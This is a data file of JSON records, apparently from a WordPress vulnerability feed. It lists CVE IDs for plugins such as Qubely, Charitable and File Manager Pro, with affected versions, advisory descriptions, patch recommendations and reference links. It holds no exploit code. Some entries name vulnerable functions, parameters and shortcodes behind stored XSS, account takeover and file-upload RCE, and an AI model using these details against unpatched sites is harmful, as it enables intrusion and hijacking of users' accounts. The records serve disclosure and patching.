{"CVE_ID":"CVE-2024-11782","slug":"wp-mailster","versionImpact":"1.8.17.0","versionEndExcluding":"1.8.18.0","description":"The WP Mailster plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'mst_subscribe' shortcode in all versions up to, and including, 1.8.17.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.18.0, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-mailster\\\/tags\\\/1.8.17.0\\\/mailster\\\/subscr\\\/SubscriberPlugin.php#L216\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/wp-mailster\\\/tags\\\/1.8.17.0\\\/mailster\\\/subscr\\\/SubscriberPlugin.php#L216\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198497\\\/wp-mailster\\\/trunk\\\/mailster\\\/subscr\\\/SubscriberPlugin.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3198497\\\/wp-mailster\\\/trunk\\\/mailster\\\/subscr\\\/SubscriberPlugin.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/909beed4-06a9-4ec4-bf00-4072a38af82b?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/909beed4-06a9-4ec4-bf00-4072a38af82b?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4385","slug":"envo-extra","versionImpact":"1.8.16","versionEndExcluding":"1.8.17","description":"The Envo Extra plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple parameters in versions up to, and including, 1.8.16 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with contributor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.17, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83d78ff7-bd59-431e-b579-156e23ede053?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/83d78ff7-bd59-431e-b579-156e23ede053?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/counter\\\/counter.php#L754\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/counter\\\/counter.php#L754\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/button\\\/button.php#L679\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/button\\\/button.php#L679\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/icon-box\\\/icon-box.php#L909\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/icon-box\\\/icon-box.php#L909\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/team\\\/team.php#L1189\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/team\\\/team.php#L1189\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/testimonial\\\/testimonial.php#L899\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/envo-extra\\\/trunk\\\/lib\\\/elementor\\\/widgets\\\/testimonial\\\/testimonial.php#L899\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080715\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3080715\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-3899","slug":"envira-gallery-lite","versionImpact":"1.8.14","versionEndExcluding":"1.8.15","description":"The Gallery Plugin for WordPress  WordPress plugin before 1.8.15 does not sanitise and escape some of its image settings, which could allow users with post-writing privilege such as Author to perform Cross-Site Scripting attacks.","recommendation":"Update to version 1.8.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3afadda-4d9a-4a51-b744-10de7d8d8578\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/e3afadda-4d9a-4a51-b744-10de7d8d8578\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-1427","slug":"photo-gallery","versionEndExcluding":"1.8.15","description":"- The Photo Gallery by 10Web WordPress plugin before 1.8.15 did not ensure that uploaded files are kept inside its uploads folder, allowing high privilege users to put images anywhere in the filesystem via a path traversal vector.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c8917ba2-4cb3-4b09-8a49-b7c612254946\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/c8917ba2-4cb3-4b09-8a49-b7c612254946\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-13228","slug":"qubely","versionImpact":"1.8.13","versionEndExcluding":"1.8.14","description":"The Qubely \u2013 Advanced Gutenberg Blocks plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.13 via the 'qubely_get_content'. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive private, pending, scheduled, password-protected, draft, and trashed post data.","recommendation":"Update to version 1.8.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qubely\\\/trunk\\\/core\\\/QUBELY.php#L1172\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qubely\\\/trunk\\\/core\\\/QUBELY.php#L1172\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253223\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3253223\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72c66e71-dddb-4142-ae13-da3caffd8714?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/72c66e71-dddb-4142-ae13-da3caffd8714?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9601","slug":"qubely","versionImpact":"1.8.12","versionEndExcluding":"1.8.13","description":"The Qubely \u2013 Advanced Gutenberg Blocks plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018align\u2019  and 'UniqueID' parameter in all versions up to, and including, 1.8.12 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.13, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qubely\\\/trunk\\\/core\\\/blocks\\\/postgrid.php#L1419\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/qubely\\\/trunk\\\/core\\\/blocks\\\/postgrid.php#L1419\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235188\\\/\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3235188\\\/\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58387a60-ef68-4911-9349-97b0f7e7726f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/58387a60-ef68-4911-9349-97b0f7e7726f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4574","slug":"graphina-elementor-charts-and-graphs","versionImpact":"1.8.9","versionEndExcluding":"1.8.10","description":"The Graphina \u2013 Elementor Charts and Graphs plugin for WordPress is vulnerable to Stored Cross-Site Scripting via multiple widgets in all versions up to, and including, 1.8.9 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.8.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/pie\\\/widget\\\/pie_google_chart.php#L391\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/pie\\\/widget\\\/pie_google_chart.php#L391\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/line\\\/widget\\\/line_google_chart.php#L578\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/line\\\/widget\\\/line_google_chart.php#L578\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/donut\\\/widget\\\/donut_google_chart.php#L384\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/donut\\\/widget\\\/donut_google_chart.php#L384\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/column\\\/widget\\\/column_google_chart.php#L536\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/column\\\/widget\\\/column_google_chart.php#L536\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/bar\\\/widget\\\/bar_google_chart.php#L524\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/bar\\\/widget\\\/bar_google_chart.php#L524\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/area\\\/widget\\\/area_google_chart.php#L570\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/google_charts\\\/area\\\/widget\\\/area_google_chart.php#L570\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/timeline\\\/widget\\\/timeline_chart.php#L462\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/timeline\\\/widget\\\/timeline_chart.php#L462\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/scatter\\\/widget\\\/scatter_chart.php#L419\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/scatter\\\/widget\\\/scatter_chart.php#L419\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/radial\\\/widget\\\/radial_chart.php#L417\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/radial\\\/widget\\\/radial_chart.php#L417\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/radar\\\/widget\\\/radar_chart.php#L546\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/radar\\\/widget\\\/radar_chart.php#L546\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/polar\\\/widget\\\/polar_chart.php#L413\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/polar\\\/widget\\\/polar_chart.php#L413\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/pie\\\/widget\\\/pie_chart.php#L279\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/pie\\\/widget\\\/pie_chart.php#L279\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/line\\\/widget\\\/line_chart.php#L426\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/line\\\/widget\\\/line_chart.php#L426\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/bro
wser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/heatmap\\\/widget\\\/heatmap_chart.php#L448\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/heatmap\\\/widget\\\/heatmap_chart.php#L448\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/donut\\\/widget\\\/donut_chart.php#L325\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/donut\\\/widget\\\/donut_chart.php#L325\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/distributed_column\\\/widget\\\/Distributed_Column_chart.php#L464\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/distributed_column\\\/widget\\\/Distributed_Column_chart.php#L464\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/column\\\/widget\\\/column_chart.php#L531\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/column\\\/widget\\\/column_chart.php#L531\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/candle\\\/widget\\\/candle_chart.php#L517\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/candle\\\/widget\\\/candle_chart.php#L517\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugi
ns.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/bubble\\\/widget\\\/bubble_chart.php#L685\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/bubble\\\/widget\\\/bubble_chart.php#L685\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/area\\\/widget\\\/area_chart.php#L457\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/graphina-elementor-charts-and-graphs\\\/trunk\\\/elementor\\\/charts\\\/area\\\/widget\\\/area_chart.php#L457\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1febe2d8-d354-4c78-a611-c1bb0937e53d?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/1febe2d8-d354-4c78-a611-c1bb0937e53d?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-8791","slug":"charitable","versionImpact":"1.8.1.14","versionEndExcluding":"1.8.1.15","description":"The Donation Forms by Charitable \u2013 Donations Plugin & Fundraising Platform for WordPress plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.8.1.14. This is due to the plugin not properly verifying a user's identity when the ID parameter is supplied through the update_core_user() function. This makes it possible for unauthenticated attackers to update the email address and password of arbitrary user accounts, including administrators, which can then be used to log in to those user accounts.","recommendation":"Update to version 1.8.1.15, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ee60943-b583-4a99-8e62-846b380c98aa?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0ee60943-b583-4a99-8e62-846b380c98aa?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.8.1.14\\\/includes\\\/users\\\/class-charitable-user.php#L872\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/charitable\\\/tags\\\/1.8.1.14\\\/includes\\\/users\\\/class-charitable-user.php#L872\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154009\\\/charitable\\\/trunk\\\/includes\\\/users\\\/class-charitable-user.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3154009\\\/charitable\\\/trunk\\\/includes\\\/users\\\/class-charitable-user.php\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-0852","slug":"coreactivity","versionImpact":"1.8","versionEndExcluding":"1.8.1","description":"The coreActivity: Activity Logging for WordPress plugin before 1.8.1 does not escape some request data when outputting it back in the admin dashboard, allowing unauthenticated users to perform Stored XSS attack against high privilege users such as admin","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/743c4d79-e1d5-4fb0-a17d-296df2c54e8a\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/743c4d79-e1d5-4fb0-a17d-296df2c54e8a\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4831","slug":"pmpro-register-helper","versionEndExcluding":"1.8.1","description":"The Custom User Profile Fields for User Registration WordPress plugin before 1.8.1 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/872fc8e6-4035-4e5a-9f30-16c482c48c7c\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/872fc8e6-4035-4e5a-9f30-16c482c48c7c\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-7115","slug":"pagelayer","versionImpact":"1.7.9","versionEndExcluding":"1.8.1","description":"The Page Builder: Pagelayer WordPress plugin before 1.8.1 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ddd1a9e-3f96-4020-9b2b-f818a4d5ba58\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/6ddd1a9e-3f96-4020-9b2b-f818a4d5ba58\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-41816","slug":"cooked","versionImpact":"1.8.0","versionEndExcluding":"1.8.1","description":"Cooked is a recipe plugin for WordPress. The Cooked plugin for WordPress is vulnerable to Persistent Cross-Site Scripting (XSS) via the \u2018[cooked-timer]\u2019 shortcode in versions up to, and including, 1.8.0 due to insufficient input sanitization and output escaping. This vulnerability allows authenticated attackers with subscriber-level access and above to inject arbitrary web scripts in pages that will execute whenever a user accesses a compromised page. This issue has been addressed in release version 1.8.1. All users are advised to upgrade. There are no known workarounds for this vulnerability.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-3gw3-2qjq-xqjj\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/security\\\/advisories\\\/GHSA-3gw3-2qjq-xqjj\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/commit\\\/ac7455bdccc99fb2f5b3c7611312947c1623c3ec\",\"name\":\"https:\\\/\\\/github.com\\\/XjSv\\\/Cooked\\\/commit\\\/ac7455bdccc99fb2f5b3c7611312947c1623c3ec\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12295","slug":"boombox-theme-extensions","versionImpact":"1.8.0","versionEndExcluding":"1.8.1","description":"The BoomBox Theme Extensions plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 1.8.0. This is due to the plugin not properly validating a user's identity prior to updating their password through the 'boombox_ajax_reset_password' function. This makes it possible for authenticated attackers, with subscriber-level privileges and above, to change arbitrary user's passwords, including administrators, and leverage that to gain access to their account.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/boombox-viral-buzz-wordpress-theme\\\/16596434\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/boombox-viral-buzz-wordpress-theme\\\/16596434\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c453aaf6-767d-4929-bbb3-3c0b78b0507a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c453aaf6-767d-4929-bbb3-3c0b78b0507a?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9530","slug":"qi-addons-for-elementor","versionImpact":"1.8.0","versionEndExcluding":"1.8.1","description":"The Qi Addons For Elementor plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.8.0 via private templates. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract sensitive data including the contents of templates that are private.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dd93514-657c-4b04-931a-23f3d405fb88?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/0dd93514-657c-4b04-931a-23f3d405fb88?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3170536%40qi-addons-for-elementor%2Ftrunk&old=3159768%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3170536%40qi-addons-for-elementor%2Ftrunk&old=3159768%40qi-addons-for-elementor%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4862","slug":"filester","versionImpact":"1.8","versionEndExcluding":"1.8.1","description":"The File Manager Pro WordPress plugin before 1.8.1 does not adequately validate and escape some inputs, leading to XSS by high-privilege users.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81821bf5-69e1-4005-b3eb-d541490909cc\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/81821bf5-69e1-4005-b3eb-d541490909cc\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-4861","slug":"filester","versionImpact":"1.8","versionEndExcluding":"1.8.1","description":"The File Manager Pro WordPress plugin before 1.8.1 allows admin users to upload arbitrary files, even in environments where such a user should not be able to gain full control of the server, such as a multisite installation. This leads to remote code execution.","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7fa03f00-25c7-4e40-8592-bb4001ce019d\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/7fa03f00-25c7-4e40-8592-bb4001ce019d\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-48300","slug":"embed-privacy","versionImpact":"1.8.0","versionEndExcluding":"1.8.1","description":"The `Embed Privacy` plugin for WordPress that prevents the loading of embedded external content is vulnerable to Stored Cross-Site Scripting via `embed_privacy_opt_out` shortcode in versions up to, and including, 1.8.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. Version 1.8.1 contains a patch for this issue.\n","recommendation":"Update to version 1.8.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/embed-privacy\\\/security\\\/advisories\\\/GHSA-3wv9-4rvf-w37g\",\"name\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/embed-privacy\\\/security\\\/advisories\\\/GHSA-3wv9-4rvf-w37g\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/embed-privacy\\\/issues\\\/199\",\"name\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/embed-privacy\\\/issues\\\/199\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/embed-privacy\\\/commit\\\/f80929992b2a5a66f4f4953cd6f46cc227154a5c\",\"name\":\"https:\\\/\\\/github.com\\\/epiphyt\\\/embed-privacy\\\/commit\\\/f80929992b2a5a66f4f4953cd6f46cc227154a5c\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/d.pr\\\/v\\\/ORuIat\",\"name\":\"https:\\\/\\\/d.pr\\\/v\\\/ORuIat\",\"refsource\":\"\",\"tags\":[]}]"}
